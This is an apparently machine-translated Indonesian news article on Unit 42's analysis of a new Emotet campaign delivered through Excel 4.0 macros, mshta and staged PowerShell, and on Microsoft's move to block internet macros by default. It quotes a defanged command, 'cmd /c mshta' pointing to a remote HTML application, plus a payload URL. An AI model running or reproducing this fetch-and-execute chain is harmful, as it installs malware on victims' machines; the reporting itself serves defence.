Malware Emotet yang terkenal telah mengubah taktik lagi, dalam kampanye email yang menyebar melalui file Excel berbahaya, para peneliti telah menemukan.
Para peneliti di Palo Alto Networks Unit 42 telah mengamati pendekatan infeksi baru untuk malware bervolume tinggi, yang diketahui dapat memodifikasi dan ubah vektor serangannya untuk menghindari deteksi sehingga dapat terus melakukan pekerjaan jahatnya, tulis mereka dalam laporan yang diterbitkan online Selasa.
“Rantai serangan baru Emotet mengungkapkan beberapa tahap dengan berbagai jenis file dan skrip yang dikaburkan sebelum tiba di muatan Emotet terakhir, ” Penulis unit 42 Saqib Khanzada, Tyler Halfpop, Micah Yates, dan Brad Duncan menulis.
Vektor serangan baru—ditemukan pada 21 Desember dan masih aktif—mengirimkan file Excel yang menyertakan makro Excel 4.0 yang dikaburkan melalui email yang direkayasa secara sosial.
“Kapan makro diaktifkan, ia mengunduh dan menjalankan aplikasi HTML yang mengunduh dua tahap PowerShell untuk diambil dan dijalankan muatan Emotet terakhir,” tulis para peneliti.
Malware yang Tidak Akan Mati
Emotet mulai hidup sebagai trojan perbankan pada tahun 2014 dan terus berkembang menjadi mekanisme pengiriman ancaman layanan lengkap, pada satu titik yang ada sebagai botnet yang menampung lebih dari 1,5 juta mesin di bawah kendalinya, menurut Check Point Software. Konsekuensi umum dari infeksi TrickBot adalah pengambilalihan rekening bank, penipuan kawat bernilai tinggi, dan serangan ransomware.
Memang, pada akhir masa kejayaannya, perkiraan kerusakan dari Emotet sekitar $2,5 miliar dolar, kata para peneliti.
Kemudian, Emotet tampaknya diberhentikan dari komisi oleh pencopotan kolaboratif penegakan hukum internasional dari jaringan ratusan server botnet yang mendukung sistem pada Januari 2021. Namun, muncul kembali November lalu di belakang TrickBot mitra-dalam-kejahatan yang sering — dan sekarang terus be a threat.
Sejak kembali, Emotet telah menggunakan pembajakan thread dan jenis taktik lainnya sebagai bagian dari metode serangan baru..
“Teknik ini menghasilkan balasan palsu berdasarkan email sah yang dicuri dari klien email host Windows yang sebelumnya terinfeksi Emotet,” tulis peneliti Unit 42. “Bonet menggunakan data email curian ini untuk membuat balasan palsu yang meniru pengirim asli.”
Contoh metode ini termasuk menggunakan tautan untuk menginstal Paket Penginstal Aplikasi Windows Adobe palsu yang dilaporkan pada bulan Desember, tulis para peneliti.
Menggunakan Excel Macros
Metode infeksi Emotet baru menggunakan makro Excel juga memiliki beberapa variasi, menurut Unit 42.
“Dalam beberapa kasus, Emotet menggunakan arsip .ZIP yang dilindungi kata sandi sebagai lampiran pada emailnya,” jelas peneliti. “Dalam kasus lain, Emotet menggunakan spreadsheet Excel yang langsung dilampirkan ke email.”
Researchers menguraikan email yang dikirim oleh botnet Emotet pada 27 Januari yang menggunakan utas email curian mulai Juni 2021. Email tersebut menggunakan iming-iming yang menyatakan “pengumuman baru ” ke “pemasok berharga” dan berisi file .ZIP terenkripsi dalam upaya untuk melewati sistem keamanan, tulis para peneliti. Itu juga termasuk kata sandi ke file .ZIP di email, sehingga korban dapat mengekstrak isinya.
“File .ZIP terenkripsi berisi satu dokumen Excel dengan makro Excel 4.0,” tulis peneliti “Makro ini adalah fitur Excel lama yang sering disalahgunakan oleh aktor jahat. Korban harus mengaktifkan makro pada host Windows yang rentan sebelum konten berbahaya diaktifkan.”
Setelah selesai, kode makro mengeksekusi cmd.exe untuk menjalankan mshta.exe, dengan argumen untuk mengambil dan menjalankan aplikasi HTML jarak jauh yang mengunduh dan mengeksekusi kode PowerShell tambahan, tulis para peneliti.
“Kode ini menggunakan kebingungan hex dan karakter untuk mencoba melewati langkah-langkah deteksi statis,” mereka menjelaskan. “String perintah deobfuscate yang dijalankan adalah: cmd /c mshta hxxp://91.240.118[.]168/se/s.html.”
Skrip PowerShell awal yang dikaburkan terhubung ke hxxp://91.240.118[.] 168/se/s.png, URL yang mengembalikan skrip berbasis teks untuk rangkaian kode PowerShell tahap kedua yang dirancang untuk mengambil biner Emotet.
“Kode PowerShell tahap kedua ini…berisi 14 URL untuk mengambil biner Emotet, ” tulis para peneliti. “Skrip mencoba setiap URL hingga biner Emotet berhasil diunduh.”
Memiliki banyak URL dalam rantai serangannya bertujuan untuk membuatnya lebih tangguh jika salah satu URL dihapus, kata para peneliti. Tahap terakhir dari rantai serangan terjadi ketika Emotet .DLL memuat PE terenkripsi dari bagian sumber dayanya, mereka menambahkan.
Microsoft untuk Memblokir Makro secara Default
Minggu lalu, Microsoft mengumumkan rencana untuk menonaktifkan semua makro secara default di beberapa aplikasi, mengakui bahwa mekanisme adalah salah satu cara paling populer di dunia untuk mengirimkan malware.
“Untuk melindungi pelanggan kami, kami perlu membuatnya lebih sulit untuk mengaktifkan makro dalam file yang diperoleh dari internet,” raksasa komputasi mencatat. “Makro VBA yang diperoleh dari internet sekarang akan diblokir secara default.”
Tiga aplikasi Office populer, Word, Excel dan PowerPoint, ditambah Access dan Visio, terpengaruh oleh perubahan tersebut.
“Untuk makro dalam file yang diperoleh dari internet, pengguna akan tidak lagi dapat mengaktifkan konten dengan mengklik tombol,” kata Microsoft. “Defaultnya lebih aman dan diharapkan membuat lebih banyak pengguna tetap aman, termasuk pengguna rumahan dan pekerja informasi di organisasi terkelola.”
Mulai akhir April, alih-alih tombol untuk “mengaktifkan makro”, pengguna akan diminta dengan “pelajari lebih lanjut” tombol yang akan membawa mereka ke informasi tambahan sebelum mereka dapat mengaktifkan makro di dalam dokumen.
Bergabunglah dengan Threatpost pada hari Rabu. 23 Februari pukul 14:00 ET untuk diskusi meja bundar LANGSUNG, “Rahasia Menjaga Rahasia”, yang disponsori oleh Keeper Security, akan berfokus pada cara menemukan dan mengunci data paling sensitif organisasi Anda. Zane Bond dengan Keeper Security akan bergabung dengan Becky Bracken dari Threatpost untuk menawarkan langkah nyata untuk melindungi informasi penting organisasi Anda di cloud, saat transit, dan di penyimpanan. DAFTAR SEKARANG dan silakan Tweet pertanyaan Anda sebelumnya @Threatpost agar dapat disertakan dalam diskusi.
Tulis komentar
Bagikan artikel ini:
- iKeamanan Web
